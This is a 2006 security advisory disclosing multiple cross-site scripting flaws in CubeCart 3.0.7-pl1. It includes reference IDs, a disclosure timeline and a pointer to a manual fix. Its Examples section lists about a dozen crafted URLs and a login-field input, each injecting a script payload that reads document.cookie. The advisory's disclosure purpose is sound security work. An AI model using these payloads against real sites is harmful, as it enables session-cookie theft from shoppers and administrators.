################################################
CubeCart 3.0.7-pl1 multiple variable Cross site scripting
Vendor url: www.cubecart.com
bug report:http://bugs.cubecart.com/?do=details&id=459
Advisore:http://lostmon.blogspot.com/2006/01/
cubecart-307-pl1-indexphp-multiple.html.
vendor notify:yes exploit avalable: yes
OSVDB ID:22471
Secunia:SA18519
BID:16259
################################################
I recomended to all vendors to look this paper..
This is the new posible impact of XSS atacks:
http://www.bindshell.net/papers/xssv.html
CubeCart contains a flaw that allows a remote cross site scripting
attack.This flaw exists because the application does not validate
some variables upon submission to 'index.php' scripts.
This could allow a user to create a specially crafted URL that
would execute arbitrary code in a user's browser within the trust
relationship between the browser and the server,leading to a
loss of integrity.
###############
VERSIONS
###############
CubeCart 3.0.7-pl1 vulnerable.
Other versions are posible vulnerables too
#################
Timeline
#################
Discovered: 24 dec 2005
vendor notify: 10-01-2006
Vendor response:
Solution:
Disclosure: 10-01-2006
Public disclosure:16-01-2006
###############
Examples:
###############
http://victim]/cc3/cart.php?act=reg&redir=L3NpdGUvZGVt
by9jYzMvaW5kZXgucGhwP3NlYXJjaFN0cj0lMjIlM0UlM0NzY3JpcH
QlM0VhbGVydCUyOCUyOSUzQyUyRnNjcmlwdCUzRSZhbXA7YWN0PXZpZ
XdDYXQmYW1wO1N1Ym1pdD1Hbw===%3D%22%3E%3Cscript
%3Ealert%28document.cookie%29%3C%2Fscript%3E
http://[victim]/cc3/cart.php?act=reg&redir==%3D%22%3E%3Cscript
%3Ealert%28document.cookie%29%3C%2Fscript%3E
http://[victim]cc3/index.php?searchStr=%3D%22%3E%3Cscript
%3Ealert%28document.cookie%29%3C%2Fscript%3E&act=viewCat
&Submit=Go
http://[victim]cc3/index.php?act=login&redir=L3NpdG
UvZGVtby9jYzMvaW5kZXgucGhwP2FjdD12aWV3RG9jJmFtcDtkb
2NJZD0x=%3D%22%3E%3Cscript
%3Ealert%28document.cookie%29%3C%2Fscript%3E
http://victim]/cc3/index.php?act=viewProd&productId=1"><script>
alert(document.cookie)</script>
http://victim]/cc3/index.php?act=viewDoc&docId=3"><script>
alert(document.cookie)</script>
http://victim]/cc3/index.php?act=viewProd"><script>
alert(document.cookie)</script>
http://victim]/cc3/index.php?act=viewCat&catId=1"><script>
alert(document.cookie)</script>
http://victim]/cc3/index.php?act=viewCat&catId=saleItems"><script>
alert(document.cookie)</script>
http://victim]/cc3/index.php?searchStr=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&act=viewCat
http://victim]/cc3/index.php?act=viewDoc&docId=1"><script>
alert(document.cookie)</script>
#################
User field XSS
#################
Go to http://victim]/cc3/index.php?act=login
and inser in the username field this: "><script>
alert(document.cookie)</script>
#############
SOLUTION
#############
no solution was available at this time
currently i found a posible fix :
see
http://lostmon.blogspot.com/2006/01/
manual-fix-for-cross-site-scripting.html
or
http://bugs.cubecart.com/?do=details&id=459
##################### €nd ########################
Thnx to estrella to be my ligth
Thnx to all manglers of http://www.osvdb.org
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....